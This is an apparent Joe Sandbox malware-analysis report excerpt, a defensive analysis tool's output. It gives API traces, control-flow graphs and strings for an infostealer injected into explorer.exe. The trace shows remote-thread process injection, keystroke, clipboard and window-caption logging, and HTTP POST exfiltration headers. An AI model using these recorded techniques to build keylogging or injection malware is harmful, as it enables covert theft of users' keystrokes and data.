                        control_flow_graph 122 6d9ae0-6d9ae5 123 6d9cad 122->123 124 6d9aeb-6d9af8 122->124 123->123 125 6d9b0a-6d9b0f 124->125 126 6d9b11 125->126 127 6d9b00-6d9b05 126->127 128 6d9b13 126->128 129 6d9b06-6d9b08 127->129 130 6d9b18-6d9b1a 128->130 129->125 129->126 131 6d9b1c-6d9b21 130->131 132 6d9b23-6d9b27 130->132 131->132 132->130 133 6d9b29 132->133 134 6d9b2b-6d9b32 133->134 135 6d9b34-6d9b39 133->135 134->130 134->135 136 6d9b48-6d9b4a 135->136 137 6d9b3b-6d9b44 135->137 140 6d9b4c-6d9b51 136->140 141 6d9b53-6d9b57 136->141 138 6d9bba-6d9bbd 137->138 139 6d9b46 137->139 142 6d9bc2-6d9bc5 138->142 139->136 140->141 143 6d9b59-6d9b5e 141->143 144 6d9b60-6d9b62 141->144 145 6d9bc7-6d9bc9 142->145 143->144 146 6d9b84-6d9b93 144->146 147 6d9b64 144->147 145->142 150 6d9bcb-6d9bce 145->150 148 6d9b95-6d9b9c 146->148 149 6d9ba4-6d9bb1 146->149 151 6d9b65-6d9b67 147->151 148->148 152 6d9b9e 148->152 149->149 153 6d9bb3-6d9bb5 149->153 150->142 154 6d9bd0-6d9bec 150->154 155 6d9b69-6d9b6e 151->155 156 6d9b70-6d9b74 151->156 152->129 153->129 154->145 157 6d9bee 154->157 155->156 156->151 158 6d9b76 156->158 159 6d9bf4-6d9bf8 157->159 160 6d9b78-6d9b7f 158->160 161 6d9b81 158->161 162 6d9c3f-6d9c42 159->162 163 6d9bfa-6d9c10 LoadLibraryA 159->163 160->151 160->161 161->146 164 6d9c45-6d9c4c 162->164 165 6d9c11-6d9c16 163->165 166 6d9c4e-6d9c50 164->166 167 6d9c70-6d9ca0 VirtualProtect * 2 164->167 165->159 168 6d9c18-6d9c1a 165->168 171 6d9c63-6d9c6e 166->171 172 6d9c52-6d9c61 166->172 173 6d9ca4-6d9ca8 167->173 169 6d9c1c-6d9c22 168->169 170 6d9c23-6d9c30 GetProcAddress 168->170 169->170 174 6d9c39-6d9c3c 170->174 175 6d9c32-6d9c37 170->175 171->172 172->164 173->173 176 6d9caa 173->176 175->165 176->123
                        Memory Dump Source
                        • Source File: 00000010.00000002.2941442870.00000000006D8000.00000040.80000000.00040000.00000000.sdmp, Offset: 006D8000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_6d8000_explorer.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: da362ac9e5a0de247ad7809a33c48f384b037aec9810ec4f41d84d4be55ef57b
                        • Instruction ID: b804f0c22f09517cc7cd5c478ee727242cae08d893ccd65066b9c2ad502a0826
                        • Opcode Fuzzy Hash: da362ac9e5a0de247ad7809a33c48f384b037aec9810ec4f41d84d4be55ef57b
                        • Instruction Fuzzy Hash: 94512571E542524AD7208E78DCC07F2B7A6EB52324B29077BC5E6CB3C6E7A45806C7B0

                        Control-flow Graph

                        control_flow_graph 177 6d276d-6d277f OpenFileMappingA 178 6d2794-6d2798 177->178 179 6d2781-6d2791 MapViewOfFile 177->179 179->178
                        APIs
                        • OpenFileMappingA.KERNEL32(00000006,00000000,00000000), ref: 006D2777
                        • MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000,?,?,006D10FE), ref: 006D2789
                        Memory Dump Source
                        • Source File: 00000010.00000002.2941442870.00000000006D1000.00000040.80000000.00040000.00000000.sdmp, Offset: 006D1000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_6d1000_explorer.jbxd
                        Similarity
                        • API ID: File$MappingOpenView
                        • String ID:
                        • API String ID: 3439327939-0
                        • Opcode ID: bf67729f1c86a6ee657a2bc02865146923439ca1a1467fac1dbbea914559e9c8
                        • Instruction ID: fbeb69988a7ac59bd0646035637b138028672058648cf741d0dd7cfdfe044c91
                        • Opcode Fuzzy Hash: bf67729f1c86a6ee657a2bc02865146923439ca1a1467fac1dbbea914559e9c8
                        • Instruction Fuzzy Hash: 7FD01732B02232BBE3345E7B6C0CF83AE9EDF86AE1B010026B50DD2250D6608810C2F0

                        Control-flow Graph

                        control_flow_graph 180 6d2a09-6d2a19 GetProcessHeap RtlAllocateHeap
                        APIs
                        • GetProcessHeap.KERNEL32(00000008,0000A000,006D10BF), ref: 006D2A0C
                        • RtlAllocateHeap.NTDLL(00000000), ref: 006D2A13
                        Memory Dump Source
                        • Source File: 00000010.00000002.2941442870.00000000006D1000.00000040.80000000.00040000.00000000.sdmp, Offset: 006D1000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_6d1000_explorer.jbxd
                        Similarity
                        • API ID: Heap$AllocateProcess
                        • String ID:
                        • API String ID: 1357844191-0
                        • Opcode ID: bcade19f6c05ebd77d1b84b7e4282743ab5f874822d77d08283861d3658fce41
                        • Instruction ID: 360673df1b0edbb7b6a00a0b1cb9cbe44d0fb17b2bb37209a13b83822595096d
                        • Opcode Fuzzy Hash: bcade19f6c05ebd77d1b84b7e4282743ab5f874822d77d08283861d3658fce41
                        • Instruction Fuzzy Hash: D8A012B0E012106BDF0417A0AD0DF053719A780701F0050017206C01508D7001048722

                        Control-flow Graph

                        control_flow_graph 181 6d29bd-6d29cd VirtualAlloc
                        APIs
                        • VirtualAlloc.KERNELBASE(00000000,00040744,00003000,00000040,006D12D9,00000000,00000000,?,00000001), ref: 006D29C7
                        Memory Dump Source
                        • Source File: 00000010.00000002.2941442870.00000000006D1000.00000040.80000000.00040000.00000000.sdmp, Offset: 006D1000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_6d1000_explorer.jbxd
                        Similarity
                        • API ID: AllocVirtual
                        • String ID:
                        • API String ID: 4275171209-0
                        • Opcode ID: a14143bc792a211034efe28826a90ecb275c9d761873c119ef69fa5913bcbab3
                        • Instruction ID: 30a0fb2e9aa5ad817fa348360b45102c4f6b2f14b3cfc3e0f60f9ed91d392baa
                        • Opcode Fuzzy Hash: a14143bc792a211034efe28826a90ecb275c9d761873c119ef69fa5913bcbab3
                        • Instruction Fuzzy Hash: 79A002B0BD6310BAFF6997519D1FF252B199740F02F105145B30A7C2D056E4B600863E

                        Control-flow Graph

                        control_flow_graph 182 6d29ae-6d29bc VirtualFree
                        APIs
                        • VirtualFree.KERNELBASE(00000000,00000000,00008000,006D13A4), ref: 006D29B6
                        Memory Dump Source
                        • Source File: 00000010.00000002.2941442870.00000000006D1000.00000040.80000000.00040000.00000000.sdmp, Offset: 006D1000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_6d1000_explorer.jbxd
                        Similarity
                        • API ID: FreeVirtual
                        • String ID:
                        • API String ID: 1263568516-0
                        • Opcode ID: f09d18f384ecda64bc35d1e53085b0336642f76b84366059cce9ac6865549971
                        • Instruction ID: ad74d095fe7e6594e86989e68c2af0f9fabf24696b703cdbc523f96e80dadb3d
                        • Opcode Fuzzy Hash: f09d18f384ecda64bc35d1e53085b0336642f76b84366059cce9ac6865549971
                        • Instruction Fuzzy Hash: 6CA00270B9171076EE7457206D0AF0567556780B02F2455457245A85D049A5A1488A19

                        Control-flow Graph

                        APIs
                          • Part of subcall function 006D2724: VirtualQuery.KERNEL32(00000000,?,0000001C,?,?,?,00000000,006D29F3,-00000001,006D128C), ref: 006D2731
                        • OpenProcess.KERNEL32(001FFFFF,00000000,?,00000000,?,00000000,00000001), ref: 006D18F4
                        • NtSetInformationProcess.NTDLL(00000000,00000034,?), ref: 006D192F
                        • NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 006D19BF
                        • RtlMoveMemory.NTDLL(00000000,006D3638,00000016), ref: 006D19E6
                        • RtlMoveMemory.NTDLL(-00000016,00000363), ref: 006D1A0E
                        • NtUnmapViewOfSection.NTDLL(000000FF,-00000016), ref: 006D1A1E
                        • CreateMutexA.KERNEL32(00000000,00000000,opera_shared_counter,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 006D1A38
                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?,00000000), ref: 006D1A40
                        • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 006D1A4E
                        • Sleep.KERNEL32(000003E8,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 006D1A55
                        • GetModuleHandleA.KERNEL32(ntdll,atan,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 006D1A6B
                        • GetProcAddress.KERNEL32(00000000), ref: 006D1A72
                        • ReadProcessMemory.KERNEL32(00000000,00000000,?,00000005,00000363), ref: 006D1A88
                        • WriteProcessMemory.KERNEL32(00000000,00000000,?,00000005,00000363), ref: 006D1AB2
                        • CreateRemoteThread.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 006D1AC5
                        • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 006D1ACC
                        • Sleep.KERNEL32(000001F4,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 006D1AD3
                        • WriteProcessMemory.KERNEL32(00000000,00000000,?,00000005,00000363), ref: 006D1AE7
                        • CreateRemoteThread.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 006D1AFE
                        • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 006D1B0B
                        • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 006D1B11
                        • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 006D1B17
                        • CloseHandle.KERNEL32(00000000,?,00000000), ref: 006D1B1A
                        Strings
                        Memory Dump Source
                        • Source File: 00000010.00000002.2941442870.00000000006D1000.00000040.80000000.00040000.00000000.sdmp, Offset: 006D1000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_6d1000_explorer.jbxd
                        Similarity
                        • API ID: Handle$Close$MemoryProcess$Create$MoveRemoteSectionSleepThreadUnmapViewWrite$AddressErrorInformationLastModuleMutexOpenProcQueryReadVirtual
                        • String ID: atan$ntdll$opera_shared_counter
                        • API String ID: 1066286714-2737717697
                        • Opcode ID: d5a890a37c4b23683ff25fd7acef6b526afa392e0dca82fa391e09b29cc63512
                        • Instruction ID: f4de1ca0106a10e16eaa115d3217e4e4f86d6b1d111e48a333ff59d34498751f
                        • Opcode Fuzzy Hash: d5a890a37c4b23683ff25fd7acef6b526afa392e0dca82fa391e09b29cc63512
                        • Instruction Fuzzy Hash: 3361AD71A05315BFD310DF209C84E6BBBEEEB8A754F04052AF949D7391D6B0DE048BA2

                        Control-flow Graph

                        APIs
                        • CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000), ref: 006D27B5
                        • CryptCreateHash.ADVAPI32(?,00008003,00000000,00000000,?), ref: 006D27CD
                        • lstrlen.KERNEL32(?,00000000), ref: 006D27D5
                        • CryptHashData.ADVAPI32(?,?,00000000,?,00000000), ref: 006D27E0
                        • CryptGetHashParam.ADVAPI32(?,00000002,?,?,00000000,?,00000000,?,00000000), ref: 006D27FA
                        • wsprintfA.USER32 ref: 006D2811
                        • CryptDestroyHash.ADVAPI32(?), ref: 006D282A
                        • CryptReleaseContext.ADVAPI32(?,00000000), ref: 006D2834
                        Strings
                        Memory Dump Source
                        • Source File: 00000010.00000002.2941442870.00000000006D1000.00000040.80000000.00040000.00000000.sdmp, Offset: 006D1000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_6d1000_explorer.jbxd
                        Similarity
                        • API ID: Crypt$Hash$Context$AcquireCreateDataDestroyParamReleaselstrlenwsprintf
                        • String ID: %02X
                        • API String ID: 3341110664-436463671
                        • Opcode ID: 3952282cce378a784ceba4bba639873d4503d0c09b83577bd84c6e926d2d3e85
                        • Instruction ID: 08d307ece1fea48d6ec9e40b9f5af6162ee66ff1e684ac8056b86c1208018a79
                        • Opcode Fuzzy Hash: 3952282cce378a784ceba4bba639873d4503d0c09b83577bd84c6e926d2d3e85
                        • Instruction Fuzzy Hash: 1D115872D01118BFEB219F95EC88EEEBFBDEB48305F1040A6FA04E2260D6314F059B61
                        APIs
                        • GetKeyboardState.USER32(?), ref: 006D1652
                        • ToUnicode.USER32(0000001B,?,?,?,00000009,00000000), ref: 006D167A
                        Strings
                        Memory Dump Source
                        • Source File: 00000010.00000002.2941442870.00000000006D1000.00000040.80000000.00040000.00000000.sdmp, Offset: 006D1000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_6d1000_explorer.jbxd
                        Similarity
                        • API ID: KeyboardStateUnicode
                        • String ID:
                        • API String ID: 3453085656-3916222277
                        • Opcode ID: 48c1a1b16a9ce5292bc0c8756579b06c02407dfe7cb466a8050250772f86a2c2
                        • Instruction ID: b51b620fddae0eb978a040f4cf1dcefb0bc24f5653d772a4d8bf347e9d1fb6eb
                        • Opcode Fuzzy Hash: 48c1a1b16a9ce5292bc0c8756579b06c02407dfe7cb466a8050250772f86a2c2
                        • Instruction Fuzzy Hash: 9F018432D01269ABDB34CB55DD45FFB73BEAF46B00F08441BE901EA351D7B0D9458AA2

                        Control-flow Graph

                        APIs
                        • RtlZeroMemory.NTDLL(006D5013,0000001C), ref: 006D13C8
                        • VirtualQuery.KERNEL32(006D13AE,?,0000001C), ref: 006D13DA
                        • GetModuleFileNameA.KERNEL32(00000000,00000000,00000104), ref: 006D140B
                        • GetCurrentProcessId.KERNEL32(00000004), ref: 006D141C
                        • wsprintfA.USER32 ref: 006D1433
                        • CreateMutexA.KERNEL32(00000000,00000000,00000000), ref: 006D1448
                        • GetLastError.KERNEL32 ref: 006D144E
                        • RtlInitializeCriticalSection.NTDLL(006D582C), ref: 006D1465
                        • Sleep.KERNEL32(000001F4), ref: 006D1489
                        • GetModuleHandleA.KERNEL32(user32.dll,TranslateMessage), ref: 006D14A6
                        • GetProcAddress.KERNEL32(00000000), ref: 006D14AF
                        • GetModuleHandleA.KERNEL32(user32.dll,GetClipboardData), ref: 006D14D0
                        • GetProcAddress.KERNEL32(00000000), ref: 006D14D3
                        • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 006D14F1
                        • CreateThread.KERNEL32(00000000,00000000,Function_0000082D,00000000,00000000,00000000), ref: 006D150D
                        • CloseHandle.KERNEL32(00000000), ref: 006D1514
                        • RtlExitUserThread.NTDLL(00000000), ref: 006D152A
                        Strings
                        Memory Dump Source
                        • Source File: 00000010.00000002.2941442870.00000000006D1000.00000040.80000000.00040000.00000000.sdmp, Offset: 006D1000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_6d1000_explorer.jbxd
                        Similarity
                        • API ID: HandleModule$AddressCreateProcThread$CloseCriticalCurrentErrorExitFileInitializeLastMemoryMutexNameProcessQuerySectionSleepUserVirtualZerowsprintf
                        • String ID: %s%d%d%d$GetClipboardData$TranslateMessage$kernel32.dll$user32.dll
                        • API String ID: 3628807430-1779906909
                        • Opcode ID: 75773266a41a16c1a05c4273518555dcd619def1204ab9ffdf5b8388e88ebe09
                        • Instruction ID: 480ba855b3c59a6bffcb10cf718a238f6ca86c45c3f44ccb73646c5cd93ee57f
                        • Opcode Fuzzy Hash: 75773266a41a16c1a05c4273518555dcd619def1204ab9ffdf5b8388e88ebe09
                        • Instruction Fuzzy Hash: 3641D4B0E01315BBD710AF66EC19D5F3BAFEB85751B01902BF506CA391CBB5D9008BA2

                        Control-flow Graph

                        APIs
                        • RtlEnterCriticalSection.NTDLL(006D582C), ref: 006D16C4
                        • lstrlenW.KERNEL32 ref: 006D16DB
                        • lstrlenW.KERNEL32 ref: 006D16F3
                        • wsprintfW.USER32 ref: 006D1743
                        • GetForegroundWindow.USER32 ref: 006D174E
                        • GetWindowTextW.USER32(00000000,006D5850,00000800), ref: 006D1767
                        • GetClassNameW.USER32(00000000,006D5850,00000800), ref: 006D1774
                        • lstrcmpW.KERNEL32(006D5020,006D5850), ref: 006D1781
                        • lstrcpyW.KERNEL32(006D5020,006D5850), ref: 006D178D
                        • wsprintfW.USER32 ref: 006D17AD
                        • lstrcatW.KERNEL32 ref: 006D17C6
                        • RtlLeaveCriticalSection.NTDLL(006D582C), ref: 006D17D3
                        Strings
                        Memory Dump Source
                        • Source File: 00000010.00000002.2941442870.00000000006D1000.00000040.80000000.00040000.00000000.sdmp, Offset: 006D1000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_6d1000_explorer.jbxd
                        Similarity
                        • API ID: CriticalSectionWindowlstrlenwsprintf$ClassEnterForegroundLeaveNameTextlstrcatlstrcmplstrcpy
                        • String ID: Clipboard -> $ New Window Caption -> $ Pm$%s%s%s$%s%s%s%s$PXm
                        • API String ID: 2651329914-3437734405
                        • Opcode ID: ea5324274c39f1a0f8919a47040b588057687f8aa6ffc9b475e1819442ca5593
                        • Instruction ID: b2258e8e4cf18ca960ef75b52ebdd83d5677f4da349efd4364f3084c24a8113a
                        • Opcode Fuzzy Hash: ea5324274c39f1a0f8919a47040b588057687f8aa6ffc9b475e1819442ca5593
                        • Instruction Fuzzy Hash: 5521E534D02635BBC3302B25FC89E6F3FABEB82B557055027F4029A771CA618E0197B6

                        Control-flow Graph

                        APIs
                        • GetCurrentProcessId.KERNEL32 ref: 006D2603
                        • GetCurrentThreadId.KERNEL32 ref: 006D260B
                        • CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 006D261B
                        • Thread32First.KERNEL32(00000000,0000001C), ref: 006D2629
                        • OpenThread.KERNEL32(001FFFFF,00000000,?), ref: 006D2648
                        • SuspendThread.KERNEL32(00000000), ref: 006D2658
                        • CloseHandle.KERNEL32(00000000), ref: 006D2667
                        • Thread32Next.KERNEL32(00000000,0000001C), ref: 006D2677
                        • CloseHandle.KERNEL32(00000000), ref: 006D2682
                        Memory Dump Source
                        • Source File: 00000010.00000002.2941442870.00000000006D1000.00000040.80000000.00040000.00000000.sdmp, Offset: 006D1000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_6d1000_explorer.jbxd
                        Similarity
                        • API ID: Thread$CloseCurrentHandleThread32$CreateFirstNextOpenProcessSnapshotSuspendToolhelp32
                        • String ID:
                        • API String ID: 1467098526-0
                        • Opcode ID: 00294b8335427b1d5e160748e4839e724f48200aa6e7f624c9a0349325ff5925
                        • Instruction ID: 859902673c3f85e41600b983fdc1f7e6a5ec331924cd79def9cb13a742cdb3c5
                        • Opcode Fuzzy Hash: 00294b8335427b1d5e160748e4839e724f48200aa6e7f624c9a0349325ff5925
                        • Instruction Fuzzy Hash: 96117C31C06361EFD7019F60AC4CA6EBBA6EF95701F04046BFA4592350D730CA498BA3

                        Control-flow Graph

                        control_flow_graph 295 6d20a1-6d20fc call 6d240f call 6d2a09 call 6d298a call 6d24cc 304 6d20fe-6d2115 295->304 305 6d2117-6d2123 295->305 308 6d2127-6d2129 304->308 305->308 309 6d23fd-6d240c call 6d29eb 308->309 310 6d212f-6d2166 RtlZeroMemory 308->310 314 6d216c-6d2187 310->314 315 6d23f5-6d23fc 310->315 316 6d21b9-6d21cb 314->316 317 6d2189-6d219a call 6d243d 314->317 315->309 322 6d21cf-6d21d1 316->322 323 6d21ad 317->323 324 6d219c-6d21ab 317->324 325 6d21d7-6d2233 call 6d288d 322->325 326 6d23e2-6d23e8 322->326 327 6d21af-6d21b7 323->327 324->327 335 6d2239-6d223e 325->335 336 6d23db 325->336 330 6d23ea-6d23ec call 6d29eb 326->330 331 6d23f1 326->331 327->322 330->331 331->315 337 6d2258-6d2286 call 6d2a09 wsprintfW 335->337 338 6d2240-6d2251 335->338 336->326 341 6d229f-6d22b6 337->341 342 6d2288-6d228a 337->342 338->337 348 6d22b8-6d22ee call 6d2a09 wsprintfW 341->348 349 6d22f5-6d230f 341->349 343 6d228b-6d228e 342->343 344 6d2299-6d229b 343->344 345 6d2290-6d2295 343->345 344->341 345->343 347 6d2297 345->347 347->341 348->349 353 6d23b8-6d23ce call 6d29eb 349->353 354 6d2315-6d2328 349->354 362 6d23d7 353->362 363 6d23d0-6d23d2 call 6d29eb 353->363 354->353 357 6d232e-6d2344 call 6d2a09 354->357 364 6d2346-6d2351 357->364 362->336 363->362 366 6d2365-6d237c 364->366 367 6d2353-6d2360 call 6d29ce 364->367 371 6d237e 366->371 372 6d2380-6d238d 366->372 367->366 371->372 372->364 373 6d238f-6d2393 372->373 374 6d23ad-6d23b4 call 6d29eb 373->374 375 6d2395-6d23a7 call 6d29bd RtlMoveMemory 373->375 374->353 375->374
                        APIs
                          • Part of subcall function 006D2A09: GetProcessHeap.KERNEL32(00000008,0000A000,006D10BF), ref: 006D2A0C
                          • Part of subcall function 006D2A09: RtlAllocateHeap.NTDLL(00000000), ref: 006D2A13
                          • Part of subcall function 006D298A: lstrlen.KERNEL32(006D4FE2,?,00000000,00000000,006D20DD,74DE8A60,006D4FE2,00000000), ref: 006D2992
                          • Part of subcall function 006D298A: MultiByteToWideChar.KERNEL32(00000000,00000000,006D4FE2,00000001,00000000,00000000), ref: 006D29A4
                          • Part of subcall function 006D24CC: RtlZeroMemory.NTDLL(?,00000018), ref: 006D24DE
                        • RtlZeroMemory.NTDLL(?,0000003C), ref: 006D2139
                        • wsprintfW.USER32 ref: 006D2272
                        • wsprintfW.USER32 ref: 006D22DD
                        • RtlMoveMemory.NTDLL(00000000,00000000,?), ref: 006D23A7
                        Strings
                        Memory Dump Source
                        • Source File: 00000010.00000002.2941442870.00000000006D1000.00000040.80000000.00040000.00000000.sdmp, Offset: 006D1000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_6d1000_explorer.jbxd
                        Similarity
                        • API ID: Memory$HeapZerowsprintf$AllocateByteCharMoveMultiProcessWidelstrlen
                        • String ID: Accept: */*Referer: %S$Content-Type: application/x-www-form-urlencoded$Host: %s$POST
                        • API String ID: 4204651544-1701262698
                        • Opcode ID: 07cc257e1b9fa745ef0a677a4878cb066bfec38402d1a78e03f64e7b85c423d6
                        • Instruction ID: 034ddbd0a0100d1c2163c449e9cf49ffbd3ae11271658f3295023b8543888bb0
                        • Opcode Fuzzy Hash: 07cc257e1b9fa745ef0a677a4878cb066bfec38402d1a78e03f64e7b85c423d6
                        • Instruction Fuzzy Hash: 27A19C70A09352AFD3509F69DC94A6BBBEAFF98740F04082EF985C7351DA34DE058B52

                        Control-flow Graph

                        control_flow_graph 380 6d24cc-6d24f0 RtlZeroMemory 382 6d2514 380->382 383 6d24f2-6d2504 380->383 385 6d2517-6d2519 382->385 383->382 384 6d2506-6d2512 383->384 384->385 386 6d251b-6d2545 385->386 387 6d2554-6d2559 385->387 390 6d254c-6d2553 386->390 391 6d2547-6d254a 386->391 390->387 391->390
                        APIs
                        • RtlZeroMemory.NTDLL(?,00000018), ref: 006D24DE
                        Strings
                        Memory Dump Source
                        • Source File: 00000010.00000002.2941442870.00000000006D1000.00000040.80000000.00040000.00000000.sdmp, Offset: 006D1000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_6d1000_explorer.jbxd
                        Similarity
                        • API ID: MemoryZero
                        • String ID: m$Om$Om$Om m
                        • API String ID: 816449071-3996221232
                        • Opcode ID: 1ac4df0a3d32894c8c77d8f7635b44e0cf1878a859df605823c528c2aeee8ae9
                        • Instruction ID: c390095652c1b1479e6e48642c20909a90229b9ddee26cb460b63c783654e4a5
                        • Opcode Fuzzy Hash: 1ac4df0a3d32894c8c77d8f7635b44e0cf1878a859df605823c528c2aeee8ae9
                        • Instruction Fuzzy Hash: 3811ECB1A0121AAFDB10DFA9E894EBEB7BDEB58701B10002AF945D7340D7309D45CB61

                        Control-flow Graph

                        APIs
                        • RtlEnterCriticalSection.NTDLL(006D582C), ref: 006D1839
                        • lstrlenW.KERNEL32 ref: 006D1845
                        • RtlLeaveCriticalSection.NTDLL(006D582C), ref: 006D18A9
                        • Sleep.KERNEL32(00007530), ref: 006D18B4
                        Strings
                        Memory Dump Source
                        • Source File: 00000010.00000002.2941442870.00000000006D1000.00000040.80000000.00040000.00000000.sdmp, Offset: 006D1000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_6d1000_explorer.jbxd
                        Similarity
                        • API ID: CriticalSection$EnterLeaveSleeplstrlen
                        • String ID: ,Xm
                        • API String ID: 2134730579-2406984751
                        • Opcode ID: 0c939ab1d9b5c2c95f0a077c2f1d87fcdb0c31c758eaf5a7655f7689cc7e1981
                        • Instruction ID: 6b265d87ddb8047eba0714a7663f3c91dccb8fbeb50323ef7a83a72a85d1c5d7
                        • Opcode Fuzzy Hash: 0c939ab1d9b5c2c95f0a077c2f1d87fcdb0c31c758eaf5a7655f7689cc7e1981
                        • Instruction Fuzzy Hash: 6101A770D12511ABD354AB65ED29C6E3BABEB42700704002FF002CB361DA709D01A7B6
                        APIs
                          • Part of subcall function 006D29BD: VirtualAlloc.KERNELBASE(00000000,00040744,00003000,00000040,006D12D9,00000000,00000000,?,00000001), ref: 006D29C7
                        • lstrlen.KERNEL32(00000000,00000000,00000000,?,00000001), ref: 006D12DC
                          • Part of subcall function 006D2A09: GetProcessHeap.KERNEL32(00000008,0000A000,006D10BF), ref: 006D2A0C
                          • Part of subcall function 006D2A09: RtlAllocateHeap.NTDLL(00000000), ref: 006D2A13
                        • PathMatchSpecA.SHLWAPI(?,00000000), ref: 006D138A
                          • Part of subcall function 006D2841: lstrlen.KERNEL32(00000000,?,?,00000001,00000000,006D1119,00000001), ref: 006D2850
                          • Part of subcall function 006D2841: lstrlen.KERNEL32(keylog_rules=,?,?,00000001,00000000,006D1119,00000001), ref: 006D2855
                        • RtlZeroMemory.NTDLL(00000000,00000104), ref: 006D1316
                        • RtlMoveMemory.NTDLL(00000000,?,?), ref: 006D1332
                          • Part of subcall function 006D2569: lstrlen.KERNEL32(00000000,00000000,00000000,00000000,006D136E), ref: 006D2591
                          • Part of subcall function 006D2569: RtlMoveMemory.NTDLL(00000FA4,00000000,00000000), ref: 006D259A
                        • RtlMoveMemory.NTDLL(00000000,?,?), ref: 006D135F
                        Memory Dump Source
                        • Source File: 00000010.00000002.2941442870.00000000006D1000.00000040.80000000.00040000.00000000.sdmp, Offset: 006D1000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_6d1000_explorer.jbxd
                        Similarity
                        • API ID: Memorylstrlen$Move$Heap$AllocAllocateMatchPathProcessSpecVirtualZero
                        • String ID:
                        • API String ID: 2993730741-0
                        • Opcode ID: 899dd13014fc575361296444295444b24d69a463d01dc8e8fe9b88367cf8939d
                        • Instruction ID: 43ff3a5003200a2377f631cdf0b0ce0c394a9f1a38b482a1fd3a0e7dc2e4ee54
                        • Opcode Fuzzy Hash: 899dd13014fc575361296444295444b24d69a463d01dc8e8fe9b88367cf8939d
                        • Instruction Fuzzy Hash: B121A070F04212AFC344EF29986597EB7DBAB95700B11052FF852DB341DB74DD098BA6
                        APIs
                        • GlobalFix.KERNEL32(00000000), ref: 006D15A9
                        • lstrlenW.KERNEL32(00000000), ref: 006D15C6
                        • lstrcatW.KERNEL32(00000000,00000000), ref: 006D15DC
                        • lstrlenW.KERNEL32(00000000), ref: 006D1600
                        • GlobalUnWire.KERNEL32(00000000), ref: 006D161C
                        Memory Dump Source
                        • Source File: 00000010.00000002.2941442870.00000000006D1000.00000040.80000000.00040000.00000000.sdmp, Offset: 006D1000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_6d1000_explorer.jbxd
                        Similarity
                        • API ID: Globallstrlen$Wirelstrcat
                        • String ID:
                        • API String ID: 2993198917-0
                        • Opcode ID: 137f7b036c701f0e1143a0355f0b824bdd0b54b811f719a18e1b0305dd41a246
                        • Instruction ID: d648a2122a0c4b028cf3e7ac60ba1fac99eaded08a6ffd0b6f755dd8cdf69648
                        • Opcode Fuzzy Hash: 137f7b036c701f0e1143a0355f0b824bdd0b54b811f719a18e1b0305dd41a246
                        • Instruction Fuzzy Hash: A901E572E001527B8765677A7D685FE63AFDFD7310708402BF407DA312DEA8CD024251
                        APIs
                        • RtlMoveMemory.NTDLL(?,?,?), ref: 006D1BF4
                        • LoadLibraryA.KERNEL32(?,006D5848,00000000,00000000,74DF2EE0,00000000,006D19B6,?,?,?,00000001,?,00000000), ref: 006D1C1C
                        • GetProcAddress.KERNEL32(00000000,-00000002), ref: 006D1C49
                        • LdrProcessRelocationBlock.NTDLL(?,?,00000008,?), ref: 006D1C9A
                        Memory Dump Source
                        • Source File: 00000010.00000002.2941442870.00000000006D1000.00000040.80000000.00040000.00000000.sdmp, Offset: 006D1000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_6d1000_explorer.jbxd
                        Similarity
                        • API ID: AddressBlockLibraryLoadMemoryMoveProcProcessRelocation
                        • String ID:
                        • API String ID: 3827878703-0
                        • Opcode ID: 4d408069c2d19563a8b557b66a259adbb1fb81eca0fcf8f1fdf4e0c5a46d811b
                        • Instruction ID: 06598130baee1d91e5768b9118dd90c19bb703f3056438665b2bef180dd1ca24
                        • Opcode Fuzzy Hash: 4d408069c2d19563a8b557b66a259adbb1fb81eca0fcf8f1fdf4e0c5a46d811b
                        • Instruction Fuzzy Hash: E6318271B50615BFCB18CF29C984BA6B7A9BF16314B14452EE846CB300D7B9E845CBA0
                        APIs
